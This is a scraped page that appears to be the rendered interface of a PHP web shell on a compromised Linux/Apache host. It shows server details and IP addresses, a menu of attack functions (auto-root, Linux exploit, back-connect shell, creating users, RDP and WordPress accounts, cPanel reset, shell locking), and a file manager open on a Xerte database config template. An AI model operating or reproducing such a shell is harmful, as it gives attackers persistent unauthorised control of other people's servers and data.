Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
xerte /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
database.php
658
B
-rw-r--r--
edit.php
4.73
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
1.18
KB
-rw-r--r--
import.php
3.45
KB
-rw-r--r--
info.xml
3.18
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
4.36
KB
-rw-r--r--
install.xml
963
B
-rw-r--r--
md5
1.99
KB
-rw-r--r--
notes.txt
261
B
-rw-r--r--
upgrade.php
3.33
KB
-rw-r--r--
upgrade.xml
392
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php /** * * database page, has the settings for database connection * * @author Patrick Lockley * @version 1.0 * @package */ /* * Database type */ $xerte_toolkits_site->database_type = 'mysql'; /* * Host where database is */ $xerte_toolkits_site->database_host = '[[softdbhost]]'; /* * Username for database */ $xerte_toolkits_site->database_username = '[[softdbuser]]'; /* * Password for database */ $xerte_toolkits_site->database_password = '[[softdbpass]]'; /* * Database name */ $xerte_toolkits_site->database_name = '[[softdb]]'; /* * Database table prefix */ $xerte_toolkits_site->database_table_prefix = '[[dbprefix]]';
Close